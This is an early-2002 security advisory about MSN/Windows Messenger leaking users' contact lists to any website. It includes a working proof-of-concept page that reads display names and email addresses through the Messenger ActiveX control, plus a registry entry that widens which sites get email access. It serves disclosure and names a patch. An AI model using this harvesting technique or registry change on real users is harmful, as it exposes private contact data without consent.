
MSN (or Windows) Messenger contact list can be stolen by any website



5th Feb 2002 [SBWID-5062]
COMMAND

	MSN (or Windows) Messenger contact list can be stolen by any website

SYSTEMS AFFECTED

	 MSN Messenger 4.6.0073 (latest at 02/02/2002) on Windows 2000 with IE 6.

	 Windows Messenger 4.6.0073 (latest at 02/02/2002) on Windows XP with IE 6.

	 

	 Probably other versions and other platforms too.

	

PROBLEM

	Richard Burton revealed :
	

	MSN Messenger (and Windows Messenger  on  XP)  can  be  used  to  obtain
	personal information about a user from any website (in any domain).
	

	Using JavaScript, a user's display name can be obtained from Messenger,
	as well as the display names of all their contacts. For users who have
	a sensible and accurate display name, this should be considered a
	privacy issue. (Note: anyone who has not set a display name at all
	will reveal their email address instead.)
	

	Using  the  same  technique  web  sites  hosted   on   certain   domains
	(microsoft.com, hotmail.com & hotmail.msn.com) can also  access  the
	email address of the user (along with the email addresses of  all  their
	contacts). This could be used by  Microsoft  to  track  users  on  their
	sites, which many would consider to be a privacy issue.
	

	In addition to the three domains  mentioned  above,  additional  domains
	can be allowed access to the email  addresses  with  a  single  registry
	entry. This registry entry could be made by spyware/adware installed  by
	a user (sometimes unknowingly along with a  piece  of  shareware).  Once
	there you have the potential to give your  email  address  to  any  site
	that requests it and places it in a cookie.
	

	Technical

	=========

	

	Microsoft designed Messenger  to  allow  functionality  to  be  used  in
	webpages using JavaScript or VBScript.  This  includes  the  ability  to
	view the display name and email address of the user and their  contacts.
	In an attempt to protect users, only a certain selection of sites can
	use script to get email addresses, but all sites can get display names.
	

	The  list  of  domain  suffixes  that  have  full  access  to  Messenger
	functionality  (email  addresses  &  more?)  can  be  found  in  the
	registry in key
	

	"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MessengerService\Policies\Suffixes".

	

	Values "Suffix0", "Suffix1", etc. By default there are no entries
	in the list, but they can be added. E.g. adding value Suffix0 =
	"test.com" will give web sites in the test.com domain full access to
	Messenger information. Because the list is empty by default, any value
	found under this key on a machine is worth checking.
	

	Full domains do not have to be specified in the list; adding "com"
	would allow all .com sites to have full access.
	

	Although by default there are no entries in  this  list,  three  domains
	(listed above) are hard coded  into  Messenger  for  the  same  purpose.
	These allow Microsoft to make their sites (e.g. Hotmail)  look  nice  by
	integrating messenger features into them. The  user  cannot  remove  the
	special status applied to these sites.
	

	For a simple how-to, just look at the source of the  demonstration  page
	given below.
	

	[http://raburton.members.easyspace.com/msn/] :
	

	

	<html>

	<head>

	  <title>MSN Messenger Privacy</title>

	

	  <div id=\"divMsgrObject\" style=\"display:none\">

	    <object classid=\'clsid:F3A614DC-ABE0-11d2-A441-00C04F795683\' codetype=\'application/x-oleobject\' height=\'1\' id=\'MsgrObj\' width=\'1\'>

	    </object>

	    <object classid=\'clsid:FB7199AB-79BF-11d2-8D94-0000F875C541\' codetype=\'application/x-oleobject\' height=\'1\' id=\'MsgrApp\' width=\'1\'>

	    </object>

	  </div>

	

	  <script event=\"onload\" for=\"window\" language=\"javascript\">

	     // Page-load script of the demonstration page. It reads the signed-in
	     // user's name and the contact list through the embedded Messenger
	     // control (the <object> with id MsgrObj) and shows them in the
	     // "details" form. Nothing in this script transmits the values; the
	     // page text points out that a site could instead store them in a cookie.

	     // textlist: one line per contact; you: the local user, or a status message

	     var textlist = \"\";

	     var you = \"\";

	     var installed = true;

	

	     // Install probe only: xObj is never used again after this check.
	     // A thrown exception or a null result both mean "not installed".

	     try {

	        var xObj = new ActiveXObject(\"Messenger.MsgrObject\");

	        if (xObj == null)

	           installed = false;

	     } catch (e) {

	        installed = false;

	     }

	

	     if (installed) {

	        // Nothing is read unless LocalState is one of the signed-in codes
	        // accepted by isStateOnline(); this matches the advisory's workaround
	        // of logging out of Messenger before browsing.

	        if (isStateOnline(MsgrObj.LocalState)) {

	           // Fetch the contact list. NOTE(review): the meaning of the
	           // argument 0 is not shown on this page.

	           var list = MsgrObj.List(0);

	

	           // Local user: display name, then logon name in parentheses.
	           // Per the page text the email/logon fields read as "undefined"
	           // unless the hosting domain is one of the three built-in domains
	           // or is listed under the Policies\Suffixes registry key.

	           you = MsgrObj.LocalFriendlyName + \" (\" + MsgrObj.LocalLogonName + \")\";

	

	           // One "FriendlyName (EmailAddress)" line per contact.
	           // i is assigned without var, so it becomes a global.

	           for (i=0; i<list.Count; i++)

	              textlist = textlist + list.Item(i).FriendlyName + \" (\" + list.Item(i).EmailAddress + \")\\n\";

	

	        } else {

	            // Installed but LocalState is not a signed-in code.

	            you = \" - MSN Messenger is not connected. - \";

	        }

	     } else {

	         // The ActiveX probe above failed.

	         you = \" - MSN Messenger is not installed. - \";

	     }

	

	     // Display only: the results go into the read-only fields of the
	     // "details" form further down the page.

	     document.forms.details.you.value = you;

	     document.forms.details.friends.value = textlist;

	

	  </script>

	</head>

	

	<body onScroll=\'nyw2()\'  onLoad=\'nyw1()\'  onMove=\'nyw2()\'  onResize=\'nyw2()\' >

	<SCRIPT>

	<!--

	// Globals for the floating banner built from the nyw18 / nyw19 <div>
	// elements later in the page (their images load from banner.easyspace.com).
	// None of these variables reference the Messenger objects.
	// nyw3..nyw6 are pixel offsets combined into nyw20 / nyw21 by nyw1();
	// presumably they derive from the banner size (62 high, 468 + 12 wide).
	var nyw3=0;

	var nyw4=62;

	var nyw5=470;

	var nyw6=12;

	// Minimum client width/height; nyw1() leaves the banner hidden below this.
	var nyw7=200;

	// Set to 1 by nyw1() once the banner has been initialised.
	var nyw8=0;

	// Set by nyw25() / nyw26(); not read anywhere in the visible code.
	var nyw9=0;

	// nyw0 is compared in nyw1() but never assigned in the visible code;
	// nyw10 holds the timer handle set by nyw24().
	var nyw0,nyw10;

	// nyw11 / nyw12 become the style (or layer) objects of nyw18 / nyw19.
	// nyw8 is declared a second time here, which is harmless with var.
	var nyw11,nyw12,nyw13,nyw8,nyw14;

	// nyw15 / nyw16: last seen scroll offsets; nyw17: polling delay in ms.
	var nyw15,nyw16,nyw17=500;

	// Banner initialisation, wired to <body onLoad>. Resolves the two banner
	// elements, picks browser-specific visibility keywords and offsets, then
	// positions and shows the large banner (nyw18). It is unrelated to the
	// Messenger demonstration; it only touches the nyw18 / nyw19 elements.
	// Returns true on every early exit and undefined when it runs to the end.
	function nyw1()

	{

	// Already initialised: nothing to do.
	if(nyw8==1)

	return true;

	// document.all branch: work on the elements' style objects.
	if(document.all)

	{

	nyw11=document.all(\"nyw18\").style;

	nyw12=document.all(\"nyw19\").style;

	nyw20=nyw4+nyw3+0;

	nyw21=nyw5+nyw6+nyw3;

	nyw22=\'visible\';

	nyw23=\'hidden\';

	}

	// Otherwise the elements are reached as document.<id> and the visibility
	// keywords are 'show' / 'hide'; offsets get an extra 15 pixels.
	else

	{

	nyw22=\'show\';

	nyw23=\'hide\';

	nyw11=document.nyw18;

	nyw12=document.nyw19;

	nyw20=nyw4+nyw3+15;

	nyw21=nyw5+nyw6+nyw3+15;

	}

	// nyw0 is never assigned in the visible code, so this branch (which
	// removes both banner elements from layout) is not taken as shown.
	if(nyw0==\"00550240\")

	{

	if(document.all)

	{

	nyw12.display=\'none\';

	nyw11.display=\'none\';

	}

	return true;

	}

	// Leave the banner hidden when the viewport is smaller than nyw7 pixels
	// in either dimension.
	if(document.all)

	{

	if(document.body.clientHeight<nyw7||document.body.clientWidth<nyw7)

	return true;

	}

	else if(document.layers)

	{

	if(window.innerHeight<nyw7||window.innerWidth<nyw7)

	return true;

	}

	// Mark as initialised before calling nyw2(), which returns early otherwise.
	nyw8=1;

	nyw2();

	nyw11.visibility=nyw22;

	// Under document.layers, scrolling is tracked by the nyw24() polling timer.
	if(document.layers)

	nyw24();

	}

	// Scroll poller for the banner, started by nyw1() under document.layers.
	// Repositions the banner whenever the page offsets change and re-arms
	// itself with setTimeout every nyw17 milliseconds.
	function nyw24()

	{

	if(pageXOffset!=nyw15||pageYOffset!=nyw16)

	{

	nyw15=pageXOffset;

	nyw16=pageYOffset;

	nyw2();

	// After a scroll, poll faster (20 ms instead of 500 ms).
	if(nyw17>=500)

	{

	nyw17=20;

	// String argument to setTimeout is evaluated as code. It assigns a
	// global named checkTime, which nothing in the visible page reads, so
	// as shown nyw17 is never set back to 500.
	// NOTE(review): looks like a leftover from renaming identifiers - confirm.
	setTimeout(\"checkTime=500\",1000);

	}

	}

	// Re-arm the poll; the handle is kept in nyw10.
	nyw10=setTimeout(\"nyw24()\",nyw17);

	}

	// Positions both banner elements; wired to the body's onScroll, onMove
	// and onResize handlers and also called from nyw1() and nyw24().
	// The banner sits at the right edge, at the bottom of the viewport while
	// the page is scrolled into its upper half and at the top otherwise.
	// Returns true when the banner is not initialised, undefined otherwise.
	function nyw2()

	{

	// Nothing to position until nyw1() has set nyw8.
	if(!nyw8)

	return true;

	if(document.all)

	{

	// Page shorter than the viewport, or scrolled less than halfway down:
	// pin to the bottom edge (nyw20 is the vertical offset from the bottom).
	if(document.body.scrollHeight<document.body.clientHeight

	||document.body.scrollTop<((document.body.scrollHeight-document.body.clientHeight)/2))

	{

	nyw11.top=document.body.scrollTop+document.body.clientHeight-nyw20;

	nyw12.top=document.body.scrollTop+document.body.clientHeight-nyw20;

	}

	else

	{

	nyw11.top=document.body.scrollTop+nyw3;

	nyw12.top=document.body.scrollTop+nyw3;

	}

	// Right-align; the small element (nyw12) is shifted a further nyw5 pixels.
	nyw11.left=document.body.scrollLeft+document.body.clientWidth-nyw21;

	nyw12.left=document.body.scrollLeft+document.body.clientWidth-nyw21+nyw5;

	}

	// Same placement expressed with window.pageXOffset / pageYOffset.
	else if(document.layers)

	{

	if(window.pageYOffset<((window.outerHeight-window.innerHeight)/2))

	{

	nyw11.top=window.pageYOffset+window.innerHeight-nyw20;

	nyw12.top=window.pageYOffset+window.innerHeight-nyw20;

	}

	else

	{

	nyw11.top=window.pageYOffset+nyw3;

	nyw12.top=window.pageYOffset+nyw3;

	}

	nyw11.left=window.pageXOffset+window.innerWidth-nyw21;

	nyw12.left=window.pageXOffset+window.innerWidth-nyw21+nyw5;

	}

	}

	// Click handler of the "Click here to shrink banner" link: shows the
	// small element (nyw19) and hides the large banner (nyw18).
	function nyw25()

	{

	nyw9=1;

	nyw12.visibility=nyw22;

	nyw11.visibility=nyw23;

	// nyw14 is never assigned in the visible code, so this clears nothing here.
	clearTimeout(nyw14);

	}

	// Click handler of the "Click here to expand banner" link: hides the
	// small element (nyw19) and shows the large banner (nyw18) again.
	function nyw26()

	{

	nyw9=0;

	nyw12.visibility=nyw23;

	nyw11.visibility=nyw22;

	}

	//-->

	</SCRIPT>

	

	<DIV ID=\"nyw19\" STYLE=\"position: absolute; top: 0; left: 0; visibility: hidden; z-index: 2147483632;\">

	<table border=0 cellspacing=0 cellpadding=0 height=62 bgcolor=\"#EEEEEE\">

	<tr>

	<td valign=\"top\"><a href=\"\" title=\"Click here to expand banner\" onClick=\"nyw26(); return false;\"><img src=\"http://banner.easyspace.com/left.gif\" width=12 height=12 border=0></a></td>

	</tr>

	<tr>

	<td valign=\"bottom\"><a href=\"http://www.easyspace.com/\" target=\"_blank\"><img src=\"http://banner.easyspace.com/littlelogo.gif\" border=0></a></td>

	</tr>

	</table>

	</DIV>

	<DIV ID=\"nyw18\" STYLE=\"position: absolute; top: 0; left: 0; z-index: 2147483647; visibility: hidden\">

	<table border=0 cellspacing=0 cellpadding=0 height=62>

	<tr>

	<td rowspan=2 valign=\"top\"><A TARGET=\"_new\" HREF=\"http://www.easyspace.com\"><IMG SRC=\"http://banner.easyspace.com/ESBIZ-468-6.gif?r=0.0380174302486864\" width=468 height=60 border=0 ALT=\"Nothing personal. Just business.\"></A></td>

	<td bgcolor=\"#EEEEEE\" valign=\"top\"><a href=\"\" title=\"Click here to shrink banner\" onClick=\"nyw25(); return false;\"><img src=\"http://banner.easyspace.com/right.gif\" width=12 height=12 border=0></a></td>

	</tr>

	<tr>

	<td bgcolor=\"#EEEEEE\" valign=\"bottom\"><a href=\"http://www.easyspace.com/\" target=\"_blank\"><img src=\"http://banner.easyspace.com/littlelogo.gif\" border=0></a></td>

	</tr>

	</table>

	</DIV>

	

	

	<h1>MSN Messenger Privacy</h1> <br>

	If you are running MSN messenger (and have JavaScript enabled) you should see 

	your name displayed below, along with a list of all your contacts. <br>

	Note: this has been tested on MSN Messenger (4.6.0073) for Win2k & Windows 

	Messenger (4.6.0073) for WinXP (all with IE 6).<br>

	<br>

	If this page was hosted on microsoft.com, hotmail.com or hotmail.msn.com you 

	would also see your email address and your contacts email addresses (instead of 

	\"undefined\"). <br>

	<br>

	This information could be placed in a cookie and next time you request an item 

	from the server (page, image, etc.), this information would be sent back to the 

	server, allowing Microsoft to know who you are and who your friends are. <br>

	<br>

	By default, everyone has access to your display name and those of your contacts, 

	but only Microsoft can get your email address this way. However third parties 

	could get access to the email addresses, by simply adding a single entry to your 

	registry. That would require a little more effort, but is easily done. <br>

	e.g. Installing software which contains \"spyware\" or \"adware\" (such as Kazaa, Go!Zilla, 

	Direct Connect, etc.*), could easily add such an entry to your registry. After 

	that you could be sending your email address to them every time your computer 

	loads an advertising banner from their site. <br>

	<br>

	To demonstrate what this would look like from a Microsoft server, or to a third 

	party after placing a registry entry on your computer add the following to your 

	registry (<a href=\"suffix0.reg\">or run this file</a>) and reload this page: <br>

	In key: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\MessengerService\\Policies\\Suffixes 

	(you may need to create the Suffixes key) <br>

	Add String: \"Suffix0\", Value: \"raburton.members.easyspace.com\" <br>

	Note: this value doesn\'t have to be a complete host name, adding just \"com\" 

	would open your contact list to any .com website. <br>

	

	<form id=\"details\">

	  You are:<br>

	  <input type=\"text\" readonly value=\"\" id=\"you\" size=\"80\">

	  <br>

	  <br>

	  Your friends are:<br>

	  <textarea readonly value=\"\" id=\"friends\" cols=\"80\" rows=\"10\">

	  </textarea>

	</form>

	

	Richard Antony Burton (<a href=\"mailto:richardaburton@hotmail.com\">richardaburton@hotmail.com</a>) 

	- 02/02/2002

	<br><br>

	* spyware/adware info from <a href=\"http://spychecker.com\">spychecker.com</a>

	<br><br>

	


	

	</body>

	

	<script language=\"javascript\">

	

	// is user online?

	function isStateOnline(state) {
	   // Status codes that count as "signed in". The page-load script reads
	   // the contact list only when MsgrObj.LocalState is one of these.
	   var signedInStates = [
	      2,   // online
	      6,   // invisible
	      10,  // busy
	      14,  // be right back
	      18,  // idle
	      34,  // away
	      50,  // on the phone
	      66   // out to lunch
	   ];

	   // Strict comparison, so only the numeric codes match.
	   for (var k = 0; k < signedInStates.length; k++) {
	      if (state === signedInStates[k]) {
	         return true;
	      }
	   }

	   // Any other value is treated as not connected.
	   return false;
	}

	</script>

	

	</html>

	

	

SOLUTION

	At this time, the only way for  a  user  to  prevent  sites  having  any
	access to their information  is  by  logging  out  of  Messenger  before
	visiting.
	

	 Update (14 February 2002)

	 ======

	

	Get patch 4.6.0076 from :
	

	http://messenger.microsoft.com/Default.asp

	

